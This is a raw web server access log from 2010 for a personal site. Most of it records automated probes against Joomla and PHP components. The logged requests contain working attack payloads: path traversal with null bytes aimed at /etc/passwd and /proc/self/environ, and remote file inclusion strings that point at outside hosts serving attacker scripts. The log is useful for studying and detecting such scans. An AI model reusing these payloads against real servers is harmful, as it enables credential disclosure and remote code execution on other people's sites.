125.141.91.138 - - [29/Jul/2010:07:09:34 -0700] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:09:34 -0700] "GET /logs//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:09:55 -0700] "GET /logs/access_100721.log//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:09:55 -0700] "GET /index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:09:56 -0700] "GET /logs//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.171.37.206 - - [29/Jul/2010:07:10:00 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
213.171.37.206 - - [29/Jul/2010:07:10:00 -0700] "GET /logs/access_100630.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
213.171.37.206 - - [29/Jul/2010:07:10:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:10:18 -0700] "GET /logs/access_100628.log//index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:10:32 -0700] "GET /logs/access_100628.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.171.37.206 - - [29/Jul/2010:07:10:34 -0700] "GET /logs/access_100701.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
213.171.37.206 - - [29/Jul/2010:07:11:22 -0700] "GET /logs/access_100701.log%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
213.171.37.206 - - [29/Jul/2010:07:11:22 -0700] "GET /logs/access_100630.log%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:12:53 -0700] "GET /logs/access_100719.log//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:12:53 -0700] "GET /index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:12:53 -0700] "GET /logs//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
81.21.79.214 - - [29/Jul/2010:07:12:54 -0700] "GET /logs/access_100721.log//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:13:15 -0700] "GET /logs/access_100628.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:13:16 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:13:16 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:16:59 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:16:59 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:17:00 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:17:02 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:17:02 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
80.249.173.117 - - [29/Jul/2010:07:17:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:17:06 -0700] "GET /logs/access_100719.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:17:06 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:17:06 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:17:19 -0700] "GET /logs/access_100720.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:37 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:37 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:37 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:38 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:38 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:39 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:40 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:40 -0700] "GET /logs/access_100405.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:18:41 -0700] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:19:01 -0700] "GET /logs/access_100712.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:19:02 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:19:02 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:19:03 -0700] "GET /logs/access_100712.log//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:19:03 -0700] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:19:04 -0700] "GET /logs//index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:19:08 -0700] "GET /logs/access_100401.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
208.69.56.95 - - [29/Jul/2010:07:19:10 -0700] "GET /logs/access_100401.log%20%20//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
174.120.181.101 - - [29/Jul/2010:07:19:57 -0700] "GET /logs/access_100719.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:21:26 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:22:29 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:23:29 -0700] "GET /logs/access_100721.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:23:29 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:23:30 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
121.78.118.123 - - [29/Jul/2010:07:23:34 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:07:23:43 -0700] "POST /logs/powred HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:07:23:43 -0700] "POST /powred HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.215.230.121 - - [29/Jul/2010:07:23:54 -0700] "POST /logs/access_100721.log%20%20/powred HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:23:54 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:09 -0700] "GET /logs/access_100715.log%20%20//index2.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:09 -0700] "GET /index2.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:10 -0700] "GET /logs//index2.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:24:10 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:14 -0700] "GET /logs/access_100719.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:21 -0700] "GET /logs//index2.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:21 -0700] "GET /index2.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:24:21 -0700] "GET /logs/access_100715.log%20%20//index2.php?_zb_path=http://sites.google.com/site/nurhayatisatu/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:07:24:39 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:25:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:25:16 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
174.123.133.162 - - [29/Jul/2010:07:25:17 -0700] "POST /logs/access_100624.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:25:41 -0700] "GET /logs/access_100720.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:25:45 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:26:28 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:26:29 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:26:29 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
217.73.227.25 - - [29/Jul/2010:07:26:45 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.73.227.25 - - [29/Jul/2010:07:26:45 -0700] "GET /logs/access_100719.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
217.73.227.25 - - [29/Jul/2010:07:26:45 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:27:02 -0700] "POST /logs/access_100720.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:27:05 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
195.5.163.207 - - [29/Jul/2010:07:27:05 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:27:26 -0700] "GET /logs/access_100529.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:27:26 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:27:26 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:07:27:54 -0700] "POST /logs/access_100716.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:07:27:54 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:07:27:54 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:07:27:56 -0700] "POST /logs/access_100716.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:07:27:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.192.58.33 - - [29/Jul/2010:07:27:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:28:24 -0700] "GET /logs/access_100719.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:28:24 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:28:24 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
213.180.89.75 - - [29/Jul/2010:07:28:29 -0700] "GET /logs/access_100720.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:28:30 -0700] "GET /logs/access_100628.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:28:30 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:28:30 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:07:29:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
67.28.112.78 - - [29/Jul/2010:07:29:03 -0700] "POST /wp-cron.php?doing_wp_cron HTTP/1.0" 404 - "-" "WordPress/2.8.5; http://sonyafatah.com/blog" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:07:29:03 -0700] "GET /blog/index.php/2008/08/16/indias-richest-man-builds-a-vanity-project-to-live-in/trackback/ HTTP/1.0" 302 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:07:29:04 -0700] "GET /blog/index.php/2008/08/16/indias-richest-man-builds-a-vanity-project-to-live-in/ HTTP/1.0" 200 14402 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:30:22 -0700] "GET /logs/access_100717.log//include.pcchess.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:30:22 -0700] "GET /logs//include.pcchess.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
212.61.10.138 - - [29/Jul/2010:07:30:22 -0700] "GET /include.pcchess.php?mosConfig_absolute_path=http://tubiwityu.fileave.com/auzsnet/Ckrid1.txt?? HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:31:15 -0700] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
125.141.91.138 - - [29/Jul/2010:07:31:21 -0700] "GET /index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:07:32:55 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:07:32:55 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:07:32:55 -0700] "POST /logs/access_100721.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:33:07 -0700] "GET /logs/access_100718.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:32:56 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:32:56 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:32:57 -0700] "GET /logs/access_100720.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:32:58 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 2309 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:32:58 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4942 "-" "libwww-perl/5.803" "sonyafatah.com"
94.23.215.207 - - [29/Jul/2010:07:32:58 -0700] "GET /logs/access_100718.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "sonyafatah.com"
209.61.244.6 - - [29/Jul/2010:07:33:07 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.76" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:07:33:32 -0700] "POST /logs/access_100721.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:07:33:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
92.246.14.11 - - [29/Jul/2010:07:33:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "sonyafatah.com"
67.195.115.242 - - [29/Jul/2010:07:33:43 -0700] "GET /logs/access_100422.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "sonyafatah.com"
